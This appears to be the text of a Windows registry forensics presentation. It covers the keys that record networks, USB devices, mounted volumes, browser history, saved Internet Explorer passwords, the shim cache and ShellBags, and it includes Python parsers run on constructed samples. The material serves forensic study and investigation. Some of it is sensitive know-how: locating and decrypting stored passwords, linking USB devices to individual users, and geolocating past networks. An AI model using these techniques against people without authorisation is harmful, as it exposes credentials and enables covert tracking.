HKLM\Software\Microsoft\Wlansvc\Interfaces (Windows 7 and 8: WLAN AutoConfig profiles, one sub key per adapter GUID; the profile XML files with the SSID and security settings are in %ProgramData%\Microsoft\Wlansvc\Profiles\Interfaces\<adapter GUID>)

In addition to logging the SSID, Windows logs the network settings of each connection, such as the IP address, DHCP server, domain and subnet mask, under the TCP/IP interface key:

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Below this key there are GUID sub keys, one per network adapter, as mentioned above. Some of the values carry timestamps: LeaseObtainedTime and LeaseTerminatesTime, for example, are Unix-epoch values (seconds since 1970, UTC) giving when the DHCP lease was obtained and when it expires, while DhcpIPAddress, DhcpServer and DhcpDefaultGateway describe the lease itself. If the computer uses vendor software to manage wireless connections there may be additional, vendor-specific locations where this information is stored. In an offline hive use the control set named by HKLM\SYSTEM\Select\Current rather than assuming ControlSet001.


LAN Computers

Windows XP's My Network Places lets a computer easily find other computers on the local area network (LAN). A computer on a properly configured LAN records the computer names (and descriptions) of the other machines it has seen on that network. Even after the computer is no longer connected to that LAN, the list of devices it saw remains in this key, including desktop computers, laptops and printers.

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions

USB Devices

Whenever a device is connected to the Universal Serial Bus, its drivers are queried and the device's information is stored in the registry (thumb drives, cameras and so on). The USBSTOR key contains one sub key per USB storage device that has ever been connected, named from the device descriptor: Disk&Ven_<vendor>&Prod_<product>&Rev_<revision>. Beneath each device sub key is the instance ID, which is normally the device's serial number followed by "&0". The serial number is assigned by the manufacturer and is unique to the device, much like the MAC address of a network card, so it can be used to establish whether a particular USB device has been connected to other Windows systems. Caveat: if a device does not report a serial number, Windows generates an instance ID whose second character is "&"; such IDs are specific to the host and cannot be correlated across machines. The Last Write time of the instance sub key and its FriendlyName value are worth recording, and on Windows 7 and 8 the Properties sub keys beneath it hold additional timestamps (first installation, and on Windows 8 last arrival and removal).

HKLM\System\CurrentControlSet\Enum\USBSTOR\

HKLM\System\CurrentControlSet\Enum\USB\ (all USB devices, keyed by VID_xxxx&PID_xxxx, including non-storage devices)

Mounted Devices

This key makes it possible to view each volume that has been associated with the system. It is the database of mounted volumes kept by the Mount Manager and used by NTFS and the other file systems:

HKLM\SYSTEM\MountedDevices

The key lists every volume that has been mounted and assigned a drive letter (\DosDevices\E:) or a persistent volume name (\??\Volume{GUID}), including USB storage devices and external DVD/CD-ROM drives. The value data identifies the device: for an MBR-partitioned fixed disk it is 12 bytes (the 4-byte disk signature followed by the 8-byte partition offset); for a USB storage device it is a UTF-16LE string of the form _??_USBSTOR#Disk&Ven_...&Prod_...&Rev_...#<serial>&0#{GUID}, which contains the same descriptor and serial number as the USBSTOR key. Matching the Volume{GUID} names here against a user's MountPoints2 key identifies which user used that USB device:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

The volume GUID is used to identify the user who plugged in the device, and the Last Write time of the matching MountPoints2\{GUID} sub key in that user's NTUSER.DAT hive is the last time the device was mounted by that user. The figure shows the Autorun sub keys beneath such an entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\....\Autorun\DefaultIcon
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\...\Autorun\DefaultLabel


Volume Serial Number

The EMDMgmt key (maintained by the ReadyBoost service) records the volume serial number and volume label of the file system on each removable device that ReadyBoost tested. Each sub key name begins with the device identifier (the same _??_USBSTOR#...#<serial>&0#{GUID} string as in MountedDevices) followed by the volume label and the volume serial number written in decimal. Knowing both the volume serial number and the volume name, we can correlate the device with shortcut file (LNK) analysis and the RecentDocs key: the LNK file contains the volume serial number and name, and the RecentDocs key will in most cases contain the volume name when the USB device is opened via Explorer. Caveat: EMDMgmt is only populated if ReadyBoost tested the device, so it is typically empty on systems whose system drive is an SSD.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt
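As an added example (not from the original deck) covering the USB Devices, Mounted Devices and Volume Serial Number sections, the following Python parses USBSTOR sub key names, decodes MountedDevices value data, ties volume GUIDs back to the users whose MountPoints2 keys contain them, and converts an EMDMgmt sub key name into the label and XXXX-XXXX volume serial that LNK files carry. All key names, SIDs, GUIDs and serials are constructed sample data.

```python
import re
import struct

USBSTOR_DEVICE_RE = re.compile(
    r"^(?P<type>[^&]+)&Ven_(?P<vendor>[^&]*)&Prod_(?P<product>[^&]*)&Rev_(?P<revision>.*)$", re.I)
# MountedDevices data for a USB volume is a UTF-16LE string of this shape.
MOUNTED_USB_RE = re.compile(r"^_\?\?_USBSTOR#(?P<device>[^#]+)#(?P<instance>[^#]+)#\{", re.I)


def parse_usbstor_device(subkey: str) -> dict:
    """Split a USBSTOR device sub key name into its descriptor fields."""
    match = USBSTOR_DEVICE_RE.match(subkey)
    if not match:
        raise ValueError(f"not a USBSTOR device key: {subkey}")
    return match.groupdict()


def parse_usbstor_instance(subkey: str) -> dict:
    """The instance sub key is the device serial plus an '&<n>' suffix. If the
    device reported no serial, Windows generates an ID whose second character
    is '&'; such an ID is unique to this host and useless for correlation."""
    generated = len(subkey) > 1 and subkey[1] == "&"
    return {"instance_id": subkey, "serial": None if generated else subkey.rsplit("&", 1)[0],
            "windows_generated": generated}


def parse_mounted_device(data: bytes) -> dict:
    """Decode the data of one HKLM\\SYSTEM\\MountedDevices value."""
    if len(data) == 12:   # MBR-partitioned fixed disk: disk signature + partition offset
        signature, offset = struct.unpack("<IQ", data)
        return {"kind": "mbr", "disk_signature": f"{signature:08X}", "partition_offset": offset}
    if data.startswith(b"DMIO:ID:"):   # GPT partition: prefix + 16-byte partition GUID
        return {"kind": "gpt", "partition_guid": data[8:24].hex()}
    text = data.decode("utf-16-le", errors="replace")
    match = MOUNTED_USB_RE.match(text)
    if match:
        return {"kind": "usbstor", **parse_usbstor_device(match["device"]),
                **parse_usbstor_instance(match["instance"])}
    return {"kind": "other", "text": text}


def users_who_mounted(mounted_devices: dict, mountpoints2_by_user: dict) -> dict:
    """MountPoints2 in each user's NTUSER.DAT has a sub key per volume GUID the
    user opened; match those against the \\??\\Volume{...} names in MountedDevices
    to list the USB serials each user mounted."""
    by_guid = {name[len("\\??\\Volume"):]: parse_mounted_device(data)
               for name, data in mounted_devices.items() if name.startswith("\\??\\Volume")}
    return {user: [by_guid[g]["serial"] for g in guids
                   if g in by_guid and by_guid[g]["kind"] == "usbstor"]
            for user, guids in mountpoints2_by_user.items()}


def emdmgmt_volume(subkey: str) -> dict:
    """EMDMgmt sub keys end with <label>_<volume serial in decimal>; convert the
    serial to the XXXX-XXXX form shown by 'dir' and stored in LNK files."""
    head, _, decimal = subkey.rpartition("_")
    serial = int(decimal)
    return {"label": head.rpartition("}")[2],
            "volume_serial": f"{serial >> 16:04X}-{serial & 0xFFFF:04X}"}


# Constructed samples, not real data.
USB_DATA = ("_??_USBSTOR#Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.26#4C530001201226112023&0"
            "#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}").encode("utf-16-le")
SAMPLE_MOUNTED_DEVICES = {
    "\\DosDevices\\C:": bytes.fromhex("78563412") + (1048576).to_bytes(8, "little"),
    "\\DosDevices\\E:": USB_DATA,
    "\\??\\Volume{9a3f7c1e-0000-0000-0000-100000000000}": USB_DATA,
}
SAMPLE_MOUNTPOINTS2 = {
    "S-1-5-21-1000-1000-1000-1001": ["{9a3f7c1e-0000-0000-0000-100000000000}"],
    "S-1-5-21-1000-1000-1000-1002": [],
}

if __name__ == "__main__":
    for name, data in SAMPLE_MOUNTED_DEVICES.items():
        print(name, parse_mounted_device(data))
    print(users_who_mounted(SAMPLE_MOUNTED_DEVICES, SAMPLE_MOUNTPOINTS2))
    print(emdmgmt_volume("_??_USBSTOR#Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.26#4C530001201226112023"
                         "&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}CRUZER_2875353799"))
```

Note that the volume serial from EMDMgmt identifies the file system on the stick, whereas the USBSTOR serial identifies the hardware; reformatting the stick changes the former but not the latter, which is why both are worth recording.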

Internet Explorer

Internet Explorer stores its data in one key, with three sub keys that hold the majority of the useful information:

HKCU\Software\Microsoft\Internet Explorer

The first sub key, Main, stores the user's Internet Explorer settings: search bars, start page, form settings and so on. One value here, FormSuggest PW Ask, relates to the next section on passwords. If it is "yes", AutoComplete is set to prompt the user to remember passwords, a good indicator that saved passwords may exist; if the user unchecked the box to never remember passwords, the value is "no" and no passwords are saved. The saved passwords themselves live in the storage keys discussed in the next section.

HKCU\Software\Microsoft\Internet Explorer\Main

The next location stores the URLs the user has typed into the address bar (values url1, url2, ..., most recent first):

HKCU\Software\Microsoft\Internet Explorer\TypedURLs

If the user clears the history in the Internet Options window, the TypedURLs key is deleted entirely and is not recreated until a URL is typed into the address field again. On Windows 8 (Internet Explorer 10 and later) the companion key TypedURLsTime holds a FILETIME for each entry.


Windows Passwords

As stated above, if FormSuggest PW Ask in the Internet Explorer\Main key is "yes" and the user tells the browser to remember a password when prompted, the Internet Explorer AutoComplete password is stored under:

HKCU\Software\Microsoft\Internet Explorer\IntelliForms\SPW

If FormSuggest PW Ask is "yes" and the user chooses NOT to remember the password, a record is still written, because the browser needs it to know not to ask again for that site. The passwords in these keys cover Internet Explorer protected sites, MSN Explorer, AutoComplete and Outlook, and they are encrypted by the operating system. On Windows XP (Internet Explorer 6) they are kept in the Protected Storage System Provider key:

HKCU\Software\Microsoft\Protected Storage System Provider

Caveat: Protected Storage was retired with Internet Explorer 7. On Windows 7 and 8 the AutoComplete data is stored under HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2, encrypted with DPAPI using the originating URL as additional entropy, so it can only be decrypted with the user's logon credentials (or DPAPI master key) together with the URL recovered from the browser history.


MSN Messenger or Windows Live Messenger

Windows Messenger, MSN Messenger and Windows Live Messenger (the renamed MSN Messenger) use the following keys for account names, contact lists and settings:

HKCU\Software\Microsoft\MessengerService
HKCU\Software\Microsoft\MSNMessenger
HKLM\Software\Microsoft\MessengerService
HKLM\Software\Microsoft\Messenger service\Session Manager\Apps\

Application Compatibility Cache

The Windows application compatibility database (the "shim cache") is used by Windows to identify executables that need compatibility shims. It tracks the executable's file path, file size (Windows XP only), the file's last-modified time and, on Windows XP, a last-update time:

HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatibility (Windows XP; value AppCompatCache)
HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache (Windows 7 and 8; value AppCompatCache)

Any executable run on the Windows system is likely to be found in this cache, so it can be used to identify systems on which specific malware was executed. Interpret the time data carefully: the timestamp stored per entry is the file's last-modified ($STANDARD_INFORMATION) time, not the time of execution. On Windows 7 the entries are ordered most recent first, and a per-entry flag records whether the file was actually executed rather than merely listed in Explorer. The cache lives in kernel memory and is written to the registry only at shutdown or reboot, so a hive copied from a running system reflects the state at the last shutdown; capture memory if the most recent executions matter.

Windows XP: at most 96 entries; the Last Update Time is updated when the file is executed.
Windows 7: at most 1024 entries; there is no Last Update Time on Windows 7 systems.

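As an added example (not from the original deck), the following Python parses the Windows 7 format of the AppCompatCache value: the 128-byte header with its 0xBADC0FFE magic and entry count, followed by fixed-size entries (32 bytes on 32-bit Windows, 48 on 64-bit) that point at UTF-16LE paths stored later in the blob. A builder produces a constructed sample in the same layout so the parser can be exercised offline; the paths and timestamps in it are invented. Windows XP and Windows 8 use different layouts and are not handled here.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
WIN7_MAGIC = 0xBADC0FFE
WIN7_HEADER_SIZE = 128
# Entry layouts: UNICODE_STRING-style length and maximum length, offset of the
# path inside the value data, last-modified FILETIME of the file, two flag
# words and an optional blob. The 64-bit build has 4 bytes of padding after
# the lengths and 8-byte offsets and sizes.
ENTRY_32 = struct.Struct("<HHIQIIII")
ENTRY_64 = struct.Struct("<HHIQQIIQQ")
CSRSS_FLAG = 0x2   # set when the image was actually executed, not merely looked at


def filetime_to_utc(filetime: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_win7_appcompatcache(data: bytes, is_64bit: bool) -> list:
    """Return the cache entries in stored order (index 0 = most recently inserted)."""
    magic, count = struct.unpack_from("<II", data, 0)
    if magic != WIN7_MAGIC:
        raise ValueError(f"not a Windows 7 AppCompatCache (magic {magic:#x})")
    layout = ENTRY_64 if is_64bit else ENTRY_32
    entries = []
    for index in range(count):
        fields = layout.unpack_from(data, WIN7_HEADER_SIZE + index * layout.size)
        if is_64bit:
            length, _max_length, _pad, offset, mtime, flags, _shim, _size, _data_off = fields
        else:
            length, _max_length, offset, mtime, flags, _shim, _size, _data_off = fields
        entries.append({
            "position": index,
            "path": data[offset:offset + length].decode("utf-16-le"),
            "last_modified": filetime_to_utc(mtime),
            "executed": bool(flags & CSRSS_FLAG),
        })
    return entries


def build_win7_appcompatcache(records, is_64bit: bool) -> bytes:
    """Constructed sample in the same layout: header, entry table, then the
    path strings, with each entry pointing at its own string."""
    layout = ENTRY_64 if is_64bit else ENTRY_32
    table, strings = b"", b""
    base = WIN7_HEADER_SIZE + len(records) * layout.size
    for path, mtime, executed in records:
        encoded = path.encode("utf-16-le")
        offset = base + len(strings)
        flags = CSRSS_FLAG if executed else 0
        if is_64bit:
            table += layout.pack(len(encoded), len(encoded) + 2, 0, offset, mtime, flags, 0, 0, 0)
        else:
            table += layout.pack(len(encoded), len(encoded) + 2, offset, mtime, flags, 0, 0, 0)
        strings += encoded + b"\x00\x00"
    header = struct.pack("<II", WIN7_MAGIC, len(records)).ljust(WIN7_HEADER_SIZE, b"\x00")
    return header + table + strings


# Constructed sample: three entries, newest first, one of them never executed.
SAMPLE_RECORDS = [
    (r"\??\C:\Users\alice\AppData\Local\Temp\update.exe", 130776498000000000, True),
    (r"\??\C:\Windows\System32\notepad.exe", 129000000000000000, True),
    (r"\??\C:\Program Files\Tool\tool.exe", 130000000000000000, False),
]
SAMPLE_CACHE_64 = build_win7_appcompatcache(SAMPLE_RECORDS, is_64bit=True)


if __name__ == "__main__":
    for entry in parse_win7_appcompatcache(SAMPLE_CACHE_64, is_64bit=True):
        print(entry["position"], entry["executed"], entry["last_modified"], entry["path"])
```

Because the stored time is the file's modification time, an entry whose timestamp is far older than the entries around it but sits near position 0 is a typical sign of an old tool recently dropped and run; the executed flag distinguishes that from a file that was only browsed.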

Shell Bags

ShellBags track the user's folder view preferences for Windows Explorer (window size, position and view mode). Because Explorer creates an entry for every folder window the user opened, including folders on removable media, network shares and inside zip archives, these keys can be used to tell that activity occurred in a folder (with timestamps from the embedded shell items) and in some cases to see which files a specific folder contained. The BagMRU tree mirrors the folder hierarchy; the Bags sub keys hold the view settings it references.

Windows XP (NTUSER.DAT):
HKCU\Software\Microsoft\Windows\Shell\BagMRU
HKCU\Software\Microsoft\Windows\Shell\Bags
HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU
HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags

Windows 7 and 8 (UsrClass.dat, also reachable through HKCR while the user is logged on; a smaller set remains under HKCU\Software\Microsoft\Windows\Shell in NTUSER.DAT):
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
HKU\S…………………….\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
HKU\S…………………….\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
HKCR\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
HKCR\Local Settings\Software\Microsoft\Windows\Shell\Bags

Interpretation: these keys store information about which folders were most recently browsed by the user.

Network History

These keys identify the networks, wired or wireless, that the computer has been connected to, together with the domain or intranet name, the SSID and the MAC address of the default gateway.

Network card details: HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkCards

Network list:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\DefaultMediaCost (Windows 8)
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\NewNetworks
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Wireless
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged

Interpretation:

Identifying the intranets and networks a computer has connected to is incredibly important. Each Profiles\{GUID} sub key holds the ProfileName, a NameType value (0x47 wireless, 0x06 wired, 0x17 broadband), and DateCreated and DateLastConnected values stored as 16-byte SYSTEMTIME structures that carry no time zone marker (check them against TimeZoneInformation), so the last time the network was connected is available directly rather than only from the key's Last Write time. The Signatures\Unmanaged (workgroup) and Signatures\Managed (domain) sub keys carry the DefaultGatewayMac, DnsSuffix and FirstNetwork values and a ProfileGuid that links back to the profile.

This will also list networks that have been connected to via VPN or broadband connections.

The MAC address of the default gateway (for a wireless network, the access point) can be looked up in a wardriving database to physically locate where the SSID was used.
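As an added example (not from the original deck), the following Python reconstructs the network history by joining the Profiles and Signatures sub keys on ProfileGuid, decoding the SYSTEMTIME dates, the NameType code and the DefaultGatewayMac bytes. The profile GUIDs, signature names, dates and MAC addresses are constructed sample data.

```python
import struct

NAME_TYPES = {0x06: "wired", 0x17: "broadband", 0x47: "wireless"}


def parse_systemtime(data: bytes) -> str:
    """DateCreated/DateLastConnected are 16-byte SYSTEMTIME structures: eight
    little-endian WORDs (year, month, day of week, day, hour, minute, second,
    millisecond). No time zone is recorded; treat them as host local time."""
    year, month, _weekday, day, hour, minute, second, _ms = struct.unpack("<8H", data)
    return f"{year:04d}-{month:02d}-{day:02d}T{hour:02d}:{minute:02d}:{second:02d}"


def format_mac(data: bytes) -> str:
    return ":".join(f"{b:02X}" for b in data)


def network_history(profiles: dict, signatures: dict) -> list:
    """Join Profiles\\{GUID} (name, type, dates) with Signatures\\*\\<signature>
    (gateway MAC, DNS suffix) on the ProfileGuid value. A profile with no
    signature still produces a row, with the gateway fields left empty."""
    by_profile = {}
    for sig_values in signatures.values():
        by_profile.setdefault(sig_values["ProfileGuid"], []).append(sig_values)
    rows = []
    for guid, values in profiles.items():
        for sig in by_profile.get(guid, [{}]):
            rows.append({
                "profile": values["ProfileName"],
                "type": NAME_TYPES.get(values["NameType"], f"unknown({values['NameType']:#x})"),
                "created": parse_systemtime(values["DateCreated"]),
                "last_connected": parse_systemtime(values["DateLastConnected"]),
                "gateway_mac": format_mac(sig["DefaultGatewayMac"]) if "DefaultGatewayMac" in sig else None,
                "dns_suffix": sig.get("DnsSuffix"),
            })
    return rows


def systemtime(year, month, day, hour, minute, second) -> bytes:
    """Builds a SYSTEMTIME for the constructed samples (day of week left 0)."""
    return struct.pack("<8H", year, month, 0, day, hour, minute, second, 0)


# Constructed samples, not real data.
SAMPLE_PROFILES = {
    "{1B2C3D4E-0000-0000-0000-000000000001}": {
        "ProfileName": "CoffeeShop-Guest", "NameType": 0x47,
        "DateCreated": systemtime(2015, 5, 20, 9, 15, 0),
        "DateLastConnected": systemtime(2015, 6, 1, 12, 30, 0)},
    "{1B2C3D4E-0000-0000-0000-000000000002}": {
        "ProfileName": "corp.example", "NameType": 0x06,
        "DateCreated": systemtime(2014, 1, 8, 8, 0, 0),
        "DateLastConnected": systemtime(2015, 5, 29, 17, 45, 12)},
}
SAMPLE_SIGNATURES = {
    # Unmanaged (workgroup) signature, keyed by its hash-like name
    "010103000F0000F00800000000000000A1B2C3D4E5F60718293A4B5C6D7E8F90": {
        "ProfileGuid": "{1B2C3D4E-0000-0000-0000-000000000001}",
        "Description": "CoffeeShop-Guest", "FirstNetwork": "CoffeeShop-Guest",
        "DefaultGatewayMac": bytes.fromhex("00259c1a2b3c")},
    # Managed (domain) signature
    "010103000F0000F080000000F0000F00B1C2D3E4F5061728394A5B6C7D8E9F01": {
        "ProfileGuid": "{1B2C3D4E-0000-0000-0000-000000000002}",
        "Description": "corp.example", "FirstNetwork": "corp.example",
        "DnsSuffix": "corp.example",
        "DefaultGatewayMac": bytes.fromhex("0050568d0001")},
}

if __name__ == "__main__":
    for row in network_history(SAMPLE_PROFILES, SAMPLE_SIGNATURES):
        print(row)
```

The gateway MAC is the value worth geolocating: the first three bytes identify the access point vendor, and wardriving databases index access points by the BSSID, which for most consumer routers is the same as or adjacent to the gateway MAC.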

(Figures: HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkCards; NetworkList\DefaultMediaCost (Windows 8); NetworkList\Profiles (details of a Wi-Fi hotspot); NetworkList\Signatures\Managed; NetworkList\Signatures\Unmanaged)

Shared files on the LAN or network

Folders shared from this computer are listed under the LanmanServer service key. Each value is a REG_MULTI_SZ holding the share name, path, remark, permissions and type, and the Security sub key holds the share-level ACL for each share:

HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares\Security

In an offline hive, CurrentControlSet is the ControlSetNNN sub key named by HKLM\SYSTEM\Select\Current (typically ControlSet001).

Thank you very much for your time.

Contact details:

Himanshu D. Patel

[email protected]

